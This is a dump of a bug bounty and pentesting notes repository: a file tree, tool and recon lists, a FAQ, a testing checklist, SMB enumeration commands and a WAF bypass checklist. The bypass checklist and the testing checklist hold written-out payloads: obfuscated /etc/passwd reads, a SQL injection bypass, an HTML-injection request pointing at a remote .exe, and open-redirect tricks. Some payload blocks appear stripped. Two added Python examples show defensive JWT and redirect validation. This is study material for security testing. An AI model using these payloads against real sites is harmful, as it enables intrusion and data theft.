```text
├── .DS_Store
├── Checklists
├── 100-web-exploits.md
├── CSRFTools.txt
├── FAQ.md
├── HuntingCheckList.md
├── Main app methodology.md
├── Multi target recon.md
├── NetworkHacking.drawio (1).png
├── OSINT.md
├── PEN-82804737-250323-0957.pdf
├── WAF-bypass-checklist.md
├── web app pentesting checklist.txt
└── webAppSec.md
├── Misc
└── TipsFromOurOverlordEdOverFlow.md
├── OSCP
├── ftpEnum.md
├── httpEnum.md
├── smbEnum.md
└── sshEnum.md
├── Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3.md
├── Practical Demonstration - Main Web Application hac da63d3dc76064964aa96d48d311abab3
├── Screenshot_from_2021-03-11_15-19-23.jpeg
├── Screenshot_from_2021-03-11_15-23-14.jpeg
├── Screenshot_from_2021-03-11_15-29-50.jpeg
├── Untitled 1.png
├── Untitled 10.png
├── Untitled 11.png
├── Untitled 12.png
├── Untitled 13.png
├── Untitled 14.png
├── Untitled 15.png
├── Untitled 16.png
├── Untitled 17.png
├── Untitled 18.png
├── Untitled 19.png
├── Untitled 2.png
├── Untitled 3.png
├── Untitled 4.png
├── Untitled 5.png
├── Untitled 6.png
├── Untitled 7.png
├── Untitled 8.png
├── Untitled 9.png
├── Untitled.png
├── burpproject.png
├── dashboard.jpeg
├── deploy.jpeg
├── enter_to_procee.jpeg
├── h1.png
└── heroku_terms.jpeg
├── README.md
├── RatFireWall
├── HorridAPIResponseFirewall
│ ├── firewall.py
│ ├── readme.md
│ └── requirements.txt
├── firewall.py
├── moreSecureButNotFullySecure
│ ├── proxy.py
│ └── rules.py
└── readme.md
├── Scripts
├── AutoSubdomainContentDiscXSSDalfox.py
├── BACProxy.py
├── BugBountyAutomator.py
├── EthsmartContractScanner.py
├── JS-CSRF-token-stealer.js
├── RatAPIChat
│ ├── README.md
│ ├── SQLiByAPISpec.py
│ ├── main.py
│ ├── readme.md
│ ├── requirements.txt
│ └── test.json
├── addUser.sh
├── autoScan.sh
├── goScan.go
├── gobuster.sh
├── initialScan.sh
├── portscan-result-basic-comparer.py
├── portscan-runtime-comparer.sh
├── resources.txt
├── scanMultipleDomains.sh
├── sqliList.sh
├── techStream.py
├── techStream
│ ├── readme.md
│ ├── resources.txt
│ └── techStream.py
├── webapp_pentest.py
├── xssList.sh
├── zap-scan-order.sh
└── zapstrikemap
│ ├── readme.md
│ └── strike.py
├── SubDomainEnum.md
├── THM_riddleme
├── TheBasicsOf
├── JavaScript.js
└── JavaScriptExploits.js
├── XSS challenge room solutions
├── labs
├── xss
│ ├── XSS1.php
│ ├── XSS2.php
│ ├── XSSDOM.php
│ ├── XSSJS.php
│ ├── XSSTAG1.php
│ ├── XSSTAG2.php
│ ├── XSSWL.php
│ └── b
└── xxe
│ ├── a
│ └── xxe.php
├── last_session.json
├── notes
├── Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae.md
├── Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae
│ ├── 0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d.md
│ ├── 0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d
│ │ ├── Subdomain_Enum.png
│ │ ├── Untitled 1.png
│ │ ├── Untitled 2.png
│ │ ├── Untitled 3.png
│ │ └── Untitled.png
│ ├── 1 Creating our list of subdomains 380c3bc8b56846108ce78f0062bed869.md
│ ├── 1 Creating our list of subdomains 380c3bc8b56846108ce78f0062bed869
│ │ ├── Untitled 1.png
│ │ └── Untitled.png
│ ├── 2 Processing Our List Of Subdomain 6bf06bf770584289a8abd9e63c7bf2bd.md
│ ├── 3 Subdomain flyover 5fe81be649ca4b849011d19ed4e53482.md
│ ├── 4 Exploiting open ports 28f4a661e49d42748c33b352ad34dc1a.md
│ ├── 4 Exploiting open ports 28f4a661e49d42748c33b352ad34dc1a
│ │ └── Untitled.png
│ ├── 98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e.md
│ ├── 98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e
│ │ ├── Untitled 1.png
│ │ ├── Untitled 2.png
│ │ └── Untitled.png
│ ├── 99 List of tools for grabbing subdomains 788400d9c9d14a79b45c2fb1f6463692.md
│ ├── A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817.md
│ ├── A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817
│ │ ├── Nuclei_scanning.png
│ │ ├── Nuclei_template_cheat_sheet.png
│ │ └── Untitled.png
│ ├── B Vulnerability testing strategy b4124e41647c49c49b11b70e1fb79cff.md
│ ├── B Vulnerability testing strategy b4124e41647c49c49b11b70e1fb79cff
│ │ └── vulnerability_scanning_(1).png
│ ├── Untitled 1.png
│ ├── Untitled 2.png
│ ├── Untitled 3.png
│ └── Untitled.png
├── Medium articles 772065d32a0a4425a2f6343adc86acb5.md
├── Medium articles 772065d32a0a4425a2f6343adc86acb5
│ ├── Are you a competitive hacker 383f929eda6c4206a762fa12c189b1b5.md
│ ├── Bugbountyhunter com membership fbd44fccb0e648f6b04fe523218e7aad.md
│ ├── Docker A Bug Bounty Hunters Best Friend df662f7e0f1a4c8290b76f8d640ded4b.md
│ ├── Docker A Bug Bounty Hunters Best Friend df662f7e0f1a4c8290b76f8d640ded4b
│ │ ├── 05C5F6F5-4262-4DFD-B4BA-8583D3051CDD.png
│ │ ├── 603D9F12-65F0-4FFC-A2F7-58AF6B4BDEF0.png
│ │ ├── 84591517-86DD-4538-84FA-23E99431FB1F.jpeg
│ │ └── D973DC7A-046A-4223-A315-5B1A3AE06058.jpeg
│ ├── How to become a hacker 2cecb0bb861f47e081a40246e1e43b47.md
│ ├── How to handle failure c4edf74994974bb388eecaddc2210199.md
│ └── Rat's mobile methodology 3adef0ef48cb4a479ac8bf1242be6957.md
├── Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a.md
├── Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a
│ ├── Screenshot_from_2021-03-11_15-19-23.jpeg
│ ├── Screenshot_from_2021-03-11_15-23-14.jpeg
│ ├── Screenshot_from_2021-03-11_15-29-50.jpeg
│ ├── Untitled 1.png
│ ├── Untitled 10.png
│ ├── Untitled 11.png
│ ├── Untitled 12.png
│ ├── Untitled 13.png
│ ├── Untitled 14.png
│ ├── Untitled 15.png
│ ├── Untitled 16.png
│ ├── Untitled 17.png
│ ├── Untitled 18.png
│ ├── Untitled 19.png
│ ├── Untitled 2.png
│ ├── Untitled 3.png
│ ├── Untitled 4.png
│ ├── Untitled 5.png
│ ├── Untitled 6.png
│ ├── Untitled 7.png
│ ├── Untitled 8.png
│ ├── Untitled 9.png
│ ├── Untitled.png
│ ├── burpproject.png
│ ├── dashboard.jpeg
│ ├── deploy.jpeg
│ ├── enter_to_procee.jpeg
│ ├── h1.png
│ └── heroku_terms.jpeg
├── Rat's methodology e728e0cffd8d429e8f9a1317b05feadf.md
├── Rat's methodology e728e0cffd8d429e8f9a1317b05feadf
│ ├── Untitled 1.png
│ ├── Untitled 2.png
│ ├── Untitled 3.png
│ ├── Untitled 4.png
│ ├── Untitled 5.png
│ ├── Untitled 6.png
│ └── Untitled.png
├── Vulnerability types d6487b7204244f159482be2dfb025fea.md
└── Vulnerability types d6487b7204244f159482be2dfb025fea
│ ├── BAC f2481eba6f7c4873b99b33739bb87033.md
│ ├── Business logic flaws fa68e1871a024a6a95399dd4cc2718a0.md
│ ├── CSRF 9bfcc03c9ce246a58d4815982e85bc18.md
│ ├── CSRF 9bfcc03c9ce246a58d4815982e85bc18
│ ├── Untitled 1.png
│ ├── Untitled 10.png
│ ├── Untitled 11.png
│ ├── Untitled 2.png
│ ├── Untitled 3.png
│ ├── Untitled 4.png
│ ├── Untitled 5.png
│ ├── Untitled 6.png
│ ├── Untitled 7.png
│ ├── Untitled 8.png
│ ├── Untitled 9.png
│ └── Untitled.png
│ ├── Command injection f3446f65fdc9437b9c16ef96b33edc36.md
│ ├── Command injection f3446f65fdc9437b9c16ef96b33edc36
│ ├── Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8.csv
│ ├── Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8
│ │ ├── Name of current user beb0eeaa290a4e0aac30baa74c77087d.md
│ │ ├── Network configuration 0cf0bc2bcef047ffa7cf5f6f3586dd02.md
│ │ ├── Network connections 4676cf7a1c6242d8812e5477a55968f4.md
│ │ ├── Operating system 8f3db179a87b4ec487f0386b866951c7.md
│ │ └── Running processes c8592e3c8fe9486eab2b3122c43f318c.md
│ ├── Untitled 1.png
│ ├── Untitled 2.png
│ └── Untitled.png
│ ├── IDOR bb563c4b361c417cb6e3ec4268889a83.md
│ ├── IDOR bb563c4b361c417cb6e3ec4268889a83
│ ├── Untitled 1.png
│ └── Untitled.png
│ ├── Insecure deserialization cb6306370b9b4cb1acf8ddf5ab35fdad.md
│ ├── Insecure deserialization cb6306370b9b4cb1acf8ddf5ab35fdad
│ └── Untitled_Diagram.png
│ ├── SSRF 810a9009d00349518ca3c663f36100ea.md
│ ├── SSRF 810a9009d00349518ca3c663f36100ea
│ ├── Untitled 1.png
│ ├── Untitled 2.png
│ └── Untitled.png
│ ├── Template injections 5633da87439b4f3b91e56feeb5a3332f.md
│ ├── Template injections 5633da87439b4f3b91e56feeb5a3332f
│ ├── CSTI c1ef3fe5df3a4f60a253596e37a2883a.md
│ └── SSTI 5934bbc2430f4887bf5a460087454341.md
│ ├── The Origin Of Business logic vulnerabilities 9f522fca6a7044b4a9ae9c1522696b5c.md
│ ├── The Origin Of Business logic vulnerabilities 9f522fca6a7044b4a9ae9c1522696b5c
│ ├── Untitled.png
│ ├── V-Model.png
│ ├── agile.png
│ └── waterfal.png
│ ├── XSS 0ad0878f33094ea6b8ac90e94c2b0dc2.md
│ ├── XSS 0ad0878f33094ea6b8ac90e94c2b0dc2
│ ├── DOM XSS 5e31c327eca54f2c84e07fd5e46df88a.md
│ ├── XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e.md
│ └── XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e
│ │ ├── Contexts 8aae6c796a57413099e7e4fdd0ef5709.csv
│ │ ├── Contexts 8aae6c796a57413099e7e4fdd0ef5709
│ │ ├── ' ` e36ffb9f04e8440f8f5b47b7e69f5478.md
│ │ ├── '); alert(); — 912c145846154ad2a89c539bd65f48ff.md
│ │ ├── Breaks javascript functions c6e6ca69b5314fce978c5b2180a6485d.md
│ │ └── Try to insert our own JS code 8a13b68fc9014164b4b0f4d929bc58fa.md
│ │ ├── Techniques c0f9870e01324ea5b82e30269cc90503.csv
│ │ ├── Techniques c0f9870e01324ea5b82e30269cc90503
│ │ ├── Attributes and tags 22b6bf65e8d14dd1a983ce484fe28460.md
│ │ ├── Basic modifications a4f80788ef62415ea79e902e21da0760.md
│ │ ├── Delimiters and brackers - 2 4a92e5bf6a90431999090ce0c9a35da3.md
│ │ ├── Delimiters and brackers bbc14efa30bd42798308d674029f85a1.md
│ │ ├── Eval() 6ea0bd9725f841a59ecc7da81ef27096.md
│ │ ├── Event handlers 52045e13e76a4091a4cb5891e914cd2b.md
│ │ ├── Event handlers 52045e13e76a4091a4cb5891e914cd2b
│ │ │ └── Untitled.png
│ │ ├── Use your imagination 3 6af362057ffa48158bc30b14979e51ad.md
│ │ └── Using filtered words in filtered words 8aa56d798b6b422e986f2b2f630adab5.md
│ │ ├── Types of XSS f9e208deac544d628aeb1522700c8975.csv
│ │ └── Types of XSS f9e208deac544d628aeb1522700c8975
│ │ ├── Step 1 63421007b22b491b9290d2789df4c8e7.md
│ │ ├── Step 2 2666a636c3b3495eb36f77acd72ac35c.md
│ │ ├── Step 3 76a1d746254847bfa08a76e7bdd956d9.md
│ │ ├── Test objectives 8e35744858e847a98f1ec476fc93d824.md
│ │ ├── Untitled 46eae952fe8c43fd8a9cd9f71c1157c6.md
│ │ └── Value reflection 8b259d50688247dfa63b88fe9d8efa33.md
│ └── XXE dbfdda26a21f48c7b1056cb7693481bb.md
├── pentesting
├── GENERAL-21331969-241122-1908.pdf
├── GENERAL-33165-241122-1907.pdf
├── GENERAL-ADMINSOP-Distributedpentesting-241122-1908.pdf
├── GENERAL-Recurringtasksatstartofproject-241122-1906.pdf
├── GENERAL-SOP-Testplantemplate-241122-1907.pdf
├── GENERAL-SOP-WebEndpointReportTemplate-241122-1907.pdf
├── GENERAL-SOP-distributedpentesting-241122-1908.pdf
├── GENERAL-Serviceoptions-241122-1905.pdf
├── GENERAL-Servicesonoffer-241122-1905.pdf
├── GENERAL-TPL-Bugtemplate-241122-1908.pdf
├── GENERAL-TPL-Pentestingreport-241122-1908.pdf
└── empty
├── preferences.json
├── recommended-targets
└── main-app.md
└── wordlists
├── Collection of wordlists.md
├── dir23.txt
└── dirlist.txt
```

/Checklists/CSRFTools.txt:
--------------------------------------------------------------------------------
1. Burp Suite Pro CSRF PoC Generator
2. CSRF PoC Generator: https://security.love/CSRF-PoC-Genorator/
3. Generic CSRF Vulnerability Scanner: https://securityforeveryone.com/tools/csrf-vulnerability-scanner
4. XSRFProbe, CSRF automatic scanner: https://github.com/0xInfection/XSRFProbe
5. PROJECT FORGERY (An Automated CSRF Exploit Generator): https://github.com/haqqibrahim/Project-Forgery
6. CSRF testing guide: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery
7.
CSRF Checklist: https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery
--------------------------------------------------------------------------------

/Checklists/FAQ.md:
--------------------------------------------------------------------------------
## Table of contents
- [Burp collaborator alternatives](#burp-collaborator-alternatives)
- [I found a website using a vulnerable version of jQuery, how do I exploit it?](#i-found-a-website-using-a-vulnerable-version-of-jquery-how-do-i-exploit-it)
- [I found a CSRF issue on the login/logout/change password/change email/...](#i-found-a-csrf-issue-on-the-loginlogoutchange-passwordchange-email)
- [How do you find the original IP and bypass the WAF for port scanning?](#how-do-you-find-the-original-ip-and-bypass-the-waf-for-port-scanning)
- [FAQ: how do I 403 bypass?](#faq-how-do-i-403-bypass)
- [Why test for IDOR and BAC by replacing the JWT token?](#why-test-for-idor-and-bac-by-replacing-the-jwt-token)
- [I found key X while hunting, is it valid?](#i-found-key-x-while-hunting-is-it-valid)

-----

## Burp collaborator alternatives
- [Interactsh](https://t.co/nqFoFQxa8W?amp=1)
- [webhook.site](https://webhook.site)
- [Request bin](https://requestbin.com/)
- [DNSBin](https://github.com/ettic-team/dnsbin)

## I found a website using a vulnerable version of jQuery, how do I exploit it?

Great question!!
- Understand which function in jQuery is vulnerable
- The developers have to use THAT function in a user-controllable way
- Execute the vulnerable function and ENSURE the developers did not apply a filter

## I found a CSRF issue on the login/logout/change password/change email/...

There is no CSRF token on the password reset/change password/login/logout.

Don't look for CSRF on functionality that needs any form of control over the user's account.
- Password change = you need the current password
- Password reset = you need the token from the victim's email address, unless you can get the server to send the token to you, but then you don't need CSRF
- Email change = password required
- Login/logout = why even?

Impact only :)<3

## How do you find the original IP and bypass the WAF for port scanning?
Cloudflare: https://blog.detectify.com/2019/07/31/bypassing-cloudflare-waf-with-the-origin-server-ip-address/

## FAQ: how do I 403 bypass?
https://github.com/Dheerajmadhukar/4-ZERO-3 !! <3 this is amazing!!

## Why test for IDOR and BAC by replacing the JWT token?
You cannot automate replacing the object IDs, because on one project the variable will be userID and on another the same variable will be named accountID. Object ID names often differ from project to project; the JWT does not.

I can show you the exact same impact from replacing the JWT by replacing the objectID and leaving the JWT alone, BUTTTT

- You might be changing random people's data
- You might be testing in a production environment

Note: if you use automation, you can only delete an object once.

## I found key X while hunting, is it valid?
[Check out this keyhacks repo](https://github.com/streaak/keyhacks)
--------------------------------------------------------------------------------

/Checklists/Multi target recon.md:
--------------------------------------------------------------------------------
**Subdomain enumeration**
- https://github.com/projectdiscovery/subfinder
- https://dnsdumpster.com/
- https://www.shodan.io/
- https://github.com/fwaeytens/dnsenum/
- https://github.com/tomnomnom/assetfinder
- https://crt.sh/
- amass
- findomain

**Checking if our subdomains are live**
- https://github.com/tomnomnom/httprobe

**(optional if you don't use httprobe) Putting HTTPS in front of subdomains**
- https://pastebin.com/3ByVDTx4

**Subdomain flyover**
- https://github.com/FortyNorthSecurity/EyeWitness
- https://github.com/michenriksen/aquatone

**Vulnerability scanners**
- https://cirt.net/Nikto2
- nuclei
- https://github.com/heilla/SecurityTesting/blob/master/initialScan.sh

**Directory brute forcing**
- https://github.com/OJ/gobuster
- Burp pro content discovery
- https://github.com/ffuf/ffuf
- https://github.com/maurosoria/dirsearch

**JavaScript analysis**
- https://github.com/GerbenJavado/LinkFinder
- https://github.com/lc/gau

**Port scanning**
- Masscan
- Naabu
- Nmap
--------------------------------------------------------------------------------

/Checklists/OSINT.md:
--------------------------------------------------------------------------------
Target: finding API keys, secrets, source code, subdomains, anything useful

# Resources
- Google - https://google.com
- Shodan - https://shodan.io
- Censys - https://censys.io
- Fofa - https://fofa.so
- Dogpile - http://www.dogpile.com
- Archives - https://archive.org
- Google hacking db

# Subdomain enum
- Aquatone - https://github.com/michenriksen/aquatone
- Sublister - https://github.com/aboul3la/Sublist3r
- DNS dumpster - https://dnsdumpster.com/
- Facebook - https://developers.facebook.com/tools/ct

# Email harvesting
- [Theharvester](https://github.com/laramies/theHarvester)
- [Prowl](https://github.com/nettitude/prowl)
- [Haveibeenpwned](https://haveibeenpwned.com/)

# Tips:
- You can use the following boolean logical operators to combine queries: AND, OR, + and -
- filetype: allows you to search for specific file extensions
- site: will filter on a specific website
- intitle: and inurl: will filter on the title or the URL
- link: finds webpages having a link to a specific URL (deprecated in 2017, but still partially works)

## Some examples:
1. NAME + CV + filetype:pdf can help you find someone's CV
2. DOMAIN - site:DOMAIN may help you find subdomains of a website
3.
SENTENCE - site:ORIGINDOMAIN may help you find websites that plagiarized or copied an article

# Chrome plugins to help with OSINT:
- archive.is Button allows you to quickly save a webpage in archive.is (more about this later)
- Wayback Machine to search for an archived page in the archive.org Wayback Machine
- OpenSource Intelligence gives quick access to many OSINT tools
- EXIF Viewer allows you to quickly view EXIF data in images
- FireShot to take screenshots quickly
--------------------------------------------------------------------------------

/Checklists/WAF-bypass-checklist.md:
--------------------------------------------------------------------------------
# Bypass checklist

## Generic checklist

- [ ] Base64 encoding our payload (/?q=)
- [ ] Backslashes in filtered words (https://site.com/index.php?file=cat /etc/pa\swd)
- [ ] Quotes and *
  https://site.com/index.php?file=cat /etc/pa*swd
  https://site.com/index.php?file=cat /etc/pa**swd
  https://site.com/index.php?file=cat /etc/pa's'wd
  https://site.com/index.php?file=cat /etc/pa"s"wd
- [ ] Wildcards (https://site.com/index.php?file=cat /e??/p????)
- [ ] Replace spaces with / ()
- [ ] Custom tags ([https://acd91f8b1e2bae3781d35fe600c30081.web-security-academy.net/?search=#x](https://acd91f8b1e2bae3781d35fe600c30081.web-security-academy.net/?search=%3CCUSTOM+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x))
- [ ] Using different language chars, e.g. ē instead of e

## Airlock Ergon

```php
%C0%80'+union+select+col1,col2,col3+from+table+--+
```

Every space here is replaced by a + and we have the %C0 and %80 URL-encoded values at the beginning of our attack vector. By [@Sec Consult](https://www.exploit-db.com/?author=1614)

## Barracuda

```php
Right-Click Here
```

A smart bypass making use of several tricks. The first line will use the onwheel event handler, which is not filtered in Barracuda. We also have a very smart use of the URL-encoded characters on the third line. Great discoveries by [@WAFNinja](https://waf.ninja/)

```http
GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US
Host: favoritewaf.com
User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
```

We can see several smart tricks being used here by [@Global-Evolution](https://www.exploit-db.com/?author=2016) to achieve HTMLi

```php
clickhere
```

And finally this amazing hacker makes smart use of the URL-encoded value %0A, which they place between every character of javascript. %0A translates to a linefeed.
And many more over at [https://github.com/0xInfection/Awesome-WAF#known-bypasses](https://github.com/0xInfection/Awesome-WAF#known-bypasses)
--------------------------------------------------------------------------------

/Checklists/web app pentesting checklist.txt:
--------------------------------------------------------------------------------
CSRF:
- Check if the token is present on every form it should be
  - ONLY Create, Update and Delete forms should have CSRF tokens
- Server checks if the token length is correct
- Server checks if the parameter is there
- Server accepts an empty parameter
- Server accepts requests without a CSRF token
- Token is not session bound

JWT:
- None-signing algorithm is allowed
- Secret is leaked somewhere
- Server never checks the secret
- Secret is easily guessable or brute-forceable

Open redirect bypass:
- evil.com/expected.com
- JavaScript open redirects
- Hidden link open redirects
- Using // to bypass
- https:evil.com (browser might correct this, filter might not catch it)
- /\ to bypass
- %00 to bypass (null byte)
- @ to bypass
- Parameter pollution (adding the same parameter twice)

BAC:
- Test that higher-privilege functions cannot be executed by a lower-privilege user
  - Test ALL user levels
  - Test with authorise
  - JS functions via developer console
  - Copy and paste of URL

IDOR:
- Test between ALL tenants (companies hosted on one server/database. Can also be divisions of companies)
  - Test with authorise
  - JS functions via developer console
  - Copy and paste of URL

Captcha bypasses:
- Try changing the request method
- Remove the captcha param from the request
- Leave the param empty
- Fill in a random value

LFI:
- Using // to bypass
- /\ to bypass
- \\
- %00 to bypass (null byte)
- @ to bypass
- URL encoding
- Double encodings

RFI:
- Using // to bypass
- /\ to bypass
- \\
- %00 to bypass (null byte)
- @ to bypass
- URL encoding
- Double encodings

SQLi:
- '" to trigger
  - SQLmap

XXE:
- SVG files (images), DOCX/XLSX, SOAP, anything XML that renders
- Blind SSRF, file exfiltration, command exec

Template injections (CSTI/SSTI):
- ${7*7}
- If it resolves, find out which templating engine
- Try to exploit by looking at the manuals
  - URL encode special chars ({}*)
  - HTML entities
  - Double encodings

XSS:
- '"`> into every input field, the moment you register and start using the application
- Enter a random value into every parameter and look for reflection
- See what context the reflection is in
- Craft an attack vector based on the context
  - JS
  - HTML
  - HTML tag attribute
  - ...
  - URL encode
  - HTML entities
  - Capital letters
  - BASE64 encode payload
- CSP might be active
  - Try bypasses
  - See what is active and where script can be loaded from
  - Encode them in base64
  - Masquerade script as data

SSRF:
- SSRF against the server itself
- SSRF against other servers on the network

Command injection:
- Test every single parameter
- Make a list of commands + command separators for the target OS

Admin panel bypass:
- Try the Referer header
- Easy username/pass
- Directory brute forcing for unprotected pages
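The JWT items in the checklist above (none-signing algorithm allowed, server never checks the secret, guessable secret), as an added example that is not code from this repository: a stdlib-only HS256 verifier in its weak form beside its strict form, with a constructed secret and constructed tokens.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed signing key for this example only; a real server loads it from configuration.
SERVER_SECRET = b"constructed-example-secret-not-for-production"


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))


def issue_token(claims: dict, secret: bytes) -> str:
    """Mint an HS256 token the way the server would."""
    signing_input = encode_segment({"alg": "HS256", "typ": "JWT"}) + "." + encode_segment(claims)
    signature = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(signature)


def unsigned_token(claims: dict) -> str:
    """A constructed 'alg: none' token with an empty signature, the first checklist item."""
    return encode_segment({"alg": "none", "typ": "JWT"}) + "." + encode_segment(claims) + "."


def weak_verify(token: str) -> Optional[dict]:
    """The checklist failure modes 'none-signing algorithm is allowed' and
    'server never checks the secret' in one place: claims are trusted as soon
    as the token parses, so anyone can mint a token with any role."""
    try:
        header_b64, claims_b64, _signature_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        if not isinstance(header, dict) or header.get("alg") not in ("HS256", "none"):
            return None
        return json.loads(b64url_decode(claims_b64))
    except ValueError:  # malformed base64 / JSON / segment count
        return None


def strict_verify(token: str, secret: bytes) -> Optional[dict]:
    """Pin the algorithm to HS256 and check the HMAC before trusting any claim."""
    try:
        header_b64, claims_b64, signature_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None  # 'none' and every other algorithm are refused, never negotiated
        signing_input = f"{header_b64}.{claims_b64}".encode("ascii")
        expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(signature_b64)):
            return None  # signed with a different secret, or claims edited after signing
        return json.loads(b64url_decode(claims_b64))
    except ValueError:
        return None


def secret_is_weak(secret: bytes, min_bytes: int = 32) -> bool:
    """RFC 7518 requires an HS256 key of at least 256 bits; anything shorter is the
    'easily guessable or brute-forceable' checklist item waiting to happen."""
    return len(secret) < min_bytes


if __name__ == "__main__":
    good = issue_token({"sub": "1234", "role": "user"}, SERVER_SECRET)
    forged = unsigned_token({"sub": "1234", "role": "admin"})
    print("weak verifier accepts forged token :", weak_verify(forged))
    print("strict verifier accepts forged token:", strict_verify(forged, SERVER_SECRET))
    print("strict verifier accepts real token  :", strict_verify(good, SERVER_SECRET))
    print("b'secret' is a weak key             :", secret_is_weak(b"secret"))
```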
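The open redirect bypass list in the checklist above, as an added example that is not part of this repository: a redirect validator on the defending side, exercised against each bypass shape the list names. The allow-listed host names and the `next` parameter name are assumptions for the example.

```python
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Hosts a redirect may legitimately point at (assumed for this example).
ALLOWED_HOSTS = {"expected.com", "www.expected.com"}

# The bypass shapes from the checklist, as constructed test inputs.
BYPASS_ATTEMPTS = [
    "https://evil.com/expected.com",      # allowed name in the path, not the host
    "javascript:void(0)",                 # JavaScript open redirect
    "//evil.com",                         # protocol-relative "//" bypass
    "https:evil.com",                     # browser repairs it, a naive filter does not
    "/\\evil.com",                        # "/\" bypass: browsers normalise "\" to "/"
    "https://expected.com%00.evil.com",   # %00 null byte
    "https://expected.com@evil.com",      # "@" userinfo trick
    "https://expected.com.evil.com",      # allowed name as a label inside the attacker host
]


def is_safe_redirect(target: str) -> bool:
    """Accept only a same-site absolute path or an https URL on an allow-listed host."""
    if not target:
        return False
    # Judge the URL the browser will act on, not the encoded form the filter sees.
    decoded = unquote(target)
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded):
        return False  # null byte, CR/LF and other control characters
    if "\\" in decoded:
        return False  # "/\evil.com" is read by browsers as "//evil.com"
    parts = urlsplit(decoded)
    if parts.scheme == "" and parts.netloc == "":
        # Relative URL: require exactly one leading slash ("/account"), which
        # rejects "evil.com/expected.com"; "//evil.com" never reaches here
        # because urlsplit already parsed evil.com as the netloc.
        return decoded.startswith("/") and not decoded.startswith("//")
    if parts.scheme != "https" or parts.netloc == "":
        return False  # "javascript:", "https:evil.com" (no netloc), "//evil.com"
    if "@" in parts.netloc:
        return False  # "https://expected.com@evil.com" lands on evil.com
    return parts.hostname in ALLOWED_HOSTS


def pick_redirect(query_string: str, param: str = "next") -> Optional[str]:
    """Read the redirect parameter from a raw query string and refuse it when it is
    absent, supplied more than once (parameter pollution) or fails is_safe_redirect."""
    values = parse_qs(query_string, keep_blank_values=True).get(param, [])
    if len(values) != 1:
        return None
    return values[0] if is_safe_redirect(values[0]) else None


if __name__ == "__main__":
    for attempt in BYPASS_ATTEMPTS:
        print(f"{attempt!r:40} -> {is_safe_redirect(attempt)}")
    print("next=/home               ->", pick_redirect("next=/home"))
    print("next=/home&next=//evil   ->", pick_redirect("next=/home&next=//evil.com"))
```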
--------------------------------------------------------------------------------

/Misc/TipsFromOurOverlordEdOverFlow.md:
--------------------------------------------------------------------------------
- Avoid using text files when creating lists with links. Use Markdown instead which makes the links clickable on GitHub.
- Avoid writing the same functions across multiple shell files. For instance, I would recommend writing a single helper function (for -h) which you can import into every script and configure.
- Whenever applicable, try to run things concurrently vs linearly. This is particularly relevant for http://scanMultipleDomains.sh. Now since I have mentioned http://scanMultipleDomains.sh, let me just add I would avoid writing single shell scripts for scanning several hosts vs a single host. You are better off writing your script so that it can process one or many hosts depending on the input. It makes it more user friendly.
- Clean user input instead of expecting the user to know what the input should look like. For example, where the protocol is required, your tool should add the protocol if it's missing. Write a single function for this purpose that can be called everywhere.
- Write the scripts in such a way that a user can add them to their /usr/bin/ or $PATH instead of having to create a copy in every target directory. There is no real need to have multiple copies of the same script everywhere on your machine.

There is more that I would personally change, but this should be enough for you to play around with for now.
--------------------------------------------------------------------------------

/OSCP/ftpEnum.md:
--------------------------------------------------------------------------------
| Enumeration step | Comment | Useful reference | Goal |
|---|---|---|---|
| Enumerate Hostname | nmblookup -A [ip] | | |
| List Shares | smbmap -H [ip/hostname] | | |
| "" | echo exit \| smbclient -L \\\\[ip] | exit takes care of any password request that might pop up, since we're checking for null login; -L gets a list of shares for the given host | |
| "" | nmap --script smb-enum-shares -p 139,445 [ip] | | |
| Check Null Sessions | smbmap -H [ip/hostname] | This command will show you the shares on the host, as well as your access to them. If you get credentials, you can re-run it to show new access | |
